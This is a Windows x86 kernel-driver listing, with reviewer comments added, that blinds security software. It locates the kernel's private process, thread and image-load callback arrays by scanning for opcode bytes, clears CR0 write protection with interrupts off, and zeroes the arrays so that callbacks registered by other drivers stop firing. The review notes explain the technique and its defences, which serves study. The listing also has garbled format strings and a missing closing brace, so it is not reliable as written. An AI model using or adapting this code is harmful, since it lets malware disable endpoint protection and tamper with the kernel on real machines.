PspCreateProcessNotifyRoutine,PspCreateThreadNotifyRoutine,PspLoadImageNotifyRoutine表全部清空


    RtlInitUnicodeString(&name,L"PsSetCreateProcessNotifyRoutine"); RemoveNotifyRoutine((PVOID)MmGetSystemRoutineAddress(&name));

    RtlInitUnicodeString(&name,L"PsRemoveCreateThreadNotifyRoutine"); RemoveNotifyRoutine((PVOID)MmGetSystemRoutineAddress(&name));

    RtlInitUnicodeString(&name,L"PsRemoveLoadImageNotifyRoutine"); RemoveNotifyRoutine((PVOID)MmGetSystemRoutineAddress(&name));

    /*
     * Clear CR0.WP (bit 16) with interrupts disabled, so that the kernel
     * writes that follow (here: zeroing the Psp*NotifyRoutine tables) are
     * not stopped by page write-protection.  Naked function: the body is
     * exactly the five instructions below, no prologue/epilogue.
     * MSVC x86 inline assembly only; pairs with EnableWPBitAndSti().
     * NOTE(review): toggling CR0.WP from a driver is a classic kernel
     * tampering primitive; on 64-bit Windows this is the class of change
     * Kernel Patch Protection exists to detect.
     */
    __declspec(naked) void DisableWPBitAndCli()
    {
        __asm {
            cli                         // interrupts off while WP is cleared
            mov     eax, cr0
            and     eax, 0xFFFEFFFF     // clear WP (bit 16)
            mov     cr0, eax
            retn
        }
    }

    /*
     * Restore CR0.WP (bit 16) and re-enable interrupts; undoes
     * DisableWPBitAndCli().  Naked function, MSVC x86 inline assembly only.
     */
    __declspec(naked) void EnableWPBitAndSti()
    {
        __asm {
            mov eax, cr0
            or  eax, 0x10000    // set WP (bit 16)
            mov cr0, eax
            sti                 // interrupts back on
            retn
        }
    }

    /*
     * Minimal IRP dispatch routine: completes every request it receives with
     * STATUS_SUCCESS and zero bytes transferred, with no priority boost
     * (second argument 0 == IO_NO_INCREMENT).
     * NOTE(review): Irp->IoStatus.Status is read back after
     * IoCompleteRequest(); once the IRP is completed the I/O manager may have
     * freed it, so returning a locally saved STATUS_SUCCESS would be safer.
     */
    NTSTATUS MydrvDispatch (
        IN PDEVICE_OBJECT DeviceObject,
        IN PIRP Irp
        )
    {
        Irp->IoStatus.Status = STATUS_SUCCESS;
        Irp->IoStatus.Information = 0L;
        IoCompleteRequest( Irp, 0 );
        return Irp->IoStatus.Status;
    }

    /* NTSTATUS RemoveNotifyRoutine(PVOID RemoveFunPointer)

    can remove all of the Routine of CreateThread and CreateProcess and
    LoadImage.  Note: the argument must be one of the following three:
        PsSetCreateProcessNotifyRoutine
        PsRemoveCreateThreadNotifyRoutine
        PsRemoveLoadImageNotifyRoutine
    =========== by xp sp2

    NOTE(review): what this does, and why it matters to a defender.  It does
    not go through the documented PsRemove* API.  It scans the first 0x20
    bytes of the exported routine for opcode 0xBF (mov edi, imm32) and treats
    the 32-bit immediate that follows as the address of the kernel's private
    callback array (PspCreateProcessNotifyRoutine /
    PspCreateThreadNotifyRoutine / PspLoadImageNotifyRoutine).  It then
    clears CR0.WP and overwrites the first 8 slots with 0, after which every
    process / thread / image-load callback registered by other drivers
    (security products included) stops being invoked.  The byte pattern and
    the hard-coded 8-entry width are tied to the x86 XP SP2 build the author
    looked at, and ULONG is used as a pointer throughout, so this is 32-bit
    only.  Integrity monitoring of these callback arrays (and, on x64,
    Kernel Patch Protection) is the control this kind of tampering runs into.
    */
    NTSTATUS RemoveNotifyRoutine(PVOID RemoveFunPointer)
    {
        ULONG AddrFun;
        ULONG* pRoutineList;
        ULONG i;

        pRoutineList = 0;
        AddrFun = (ULONG)RemoveFunPointer;
        // NOTE(review): the DbgPrint format strings in this listing look
        // garbled by extraction (presumably "%X\n"); kept as found.
        DbgPrint("RemoveNotifyRoutine = X/n",RemoveFunPointer);
        //
        //the RemoveFunPointer could
        //only be PsRemoveLoadImageNotifyRoutine
        //or PsSetCreateProcessNotifyRoutine
        //or PsRemoveCreateThreadNotifyRoutine
        //find code bf 00975680      mov     edi,offset nt!PsThreadType+0x44 (80569700)
        //
        // Byte-wise scan of the exported routine for opcode 0xBF; the four
        // bytes after it are read as the callback-array address.
        for(i = AddrFun;i<AddrFun + 0x20;i++)
        {
            if( 0xbf == *(PBYTE)i )
            {
                i++;
                pRoutineList = (ULONG*)( *(ULONG*)i );
                break;
            }
        }

        if( 0 == pRoutineList)
        {
            DbgPrint("Can not find the RoutineList/n");
            return STATUS_UNSUCCESSFUL;
        }
        if( TRUE != MmIsAddressValid((PVOID)pRoutineList) )// memory is valid
        {
            DbgPrint("Access Memory is not Valid X/n",pRoutineList);
            return STATUS_UNSUCCESSFUL;
        }
        //
        //Zero the PspCreateThreadNotifyRoutine;
        //
        // Write protection is off and interrupts are disabled only around
        // this loop; this is the write that blinds registered callbacks.
        DisableWPBitAndCli();
        for(i=0;i<8;i++) // Using 0x40 here also works; the table looks 0x40 long
                         // to me, but online sources say the
                         // PspCreateProcessNotifyRoutine table is 8 entries on
                         // Win2K.  I could not find the XP figure and did not
                         // bother analyzing the code to work out its length.
        {
            //if( 0 == pRoutineList[i] )break;
            pRoutineList[i] = 0;//clear
        }
        EnableWPBitAndSti();

        DbgPrint("RemoveNotifyRoutine STATUS_SUCCESS X/n",RemoveFunPointer);
        return STATUS_SUCCESS;
        /* NOTE(review): the closing brace of RemoveNotifyRoutine is missing
           from this listing; the function ends here in the original. */

